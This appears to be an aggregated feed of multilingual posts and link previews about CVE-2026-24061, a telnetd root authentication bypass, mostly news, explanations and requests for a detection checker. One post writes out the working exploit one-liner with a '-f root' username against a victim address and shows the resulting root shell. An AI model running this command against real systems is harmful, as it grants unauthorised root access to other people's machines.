This Week In Security: Getting Back Up To Speed

Editor’s Note: Over the course of nearly 300 posts, Jonathan Bennett set a very high bar for this column, so we knew it needed to be placed in the hands of somebody who could do it justice. T…

Hackaday
Telnetd 出包

在「2026-01-14: The Day the telnet Died (via)」這邊看到的,這篇是講一堆 ISP 擋 port 23 的事情,因為有 backdoor 開始用 telnetd 的漏洞。 這個漏洞有夠哭腰,只要用 -f root 當作 username 就會拿到 root 了,免密碼: CVE-2026-24061 is a critical (CVSS 9.

Gea-Suan Lin's BLOG
Telnet-Sicherheitslücke: Wegen kritischen Risikos patchen

Eine kritische Sicherheitslücke in telnetd der GNU InetUtils erheischt derzeit Aufmerksamkeit. Admins sollten patchen.

heise online

Warning: computer nerd stuff below:

So. In 2026, telnet is still a thing.
Really? 😑

ubuntu@ubuntu:~$ USER=“-f root” telnet -a victim.ip.address

[usual Ubuntu /etc/issue text]

root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)

You’re welcome.

#itsecurity #unix #linux #telnet #telnetd

Security Week 2605: тривиальная ошибка в telnetd

20 января разработчик Саймон Йозефссон опубликовал в рассылке oss-sec информацию о крайне серьезной уязвимости в демоне telnetd, реализующем удаленное подключение по протоколу telnet. В традиционной для описания уязвимости терминологии суть проблемы заключается в следующем: «ошибка в обработке входящих данных позволяет злоумышленнику пропустить процесс аутентификации и получить на подверженной уязвимости системе права суперпользователя». Применение таких терминов обычно обозначает, что подлинное описание проблемы либо слишком длинное, либо слишком сложное для понимания, но в данном случае это не так. При подключении к telnetd нужно указать имя пользователя. Его программа передает стандартной утилите login , причем передача осуществляется без предварительной проверки ввода от желающего подключиться. Если указать вместо имени пользователя строку «-f root», эти данные будут переданы в утилиту login, а она уже залогинит любого желающего под рутом без какой-либо авторизации, увидев соответствующий ключ -f. Собственно, это вся уязвимость как есть.

https://habr.com/ru/companies/kaspersky/articles/989152/

#иб #telnetd

Security Week 2605: тривиальная ошибка в telnetd

20 января разработчик Саймон Йозефссон опубликовал в рассылке oss-sec информацию о крайне серьезной уязвимости в демоне telnetd, реализующем удаленное подключение по протоколу telnet. В традиционной...

Хабр

I've successfully tested the PoC in the #SafeBreach Labs GitHub repository. It seems like a good place to start to write a checker (if there isn't a good one).

https://github.com/SafeBreach-Labs/CVE-2026-24061

#CVE_2026_24061 #telnetd #vulnerability

GitHub - SafeBreach-Labs/CVE-2026-24061: Exploitation of CVE-2026-24061

Exploitation of CVE-2026-24061. Contribute to SafeBreach-Labs/CVE-2026-24061 development by creating an account on GitHub.

GitHub

Any good, legitimate checker around for CVE-2026-24061 ?

Exploitation is trivial, checking for the vulnerability, not so much.

#CVE_2026_24061 #telnetd #vulnerability

Exploitation is completely trivial...

#CVE_2026_24061 #telnetd #vulnerability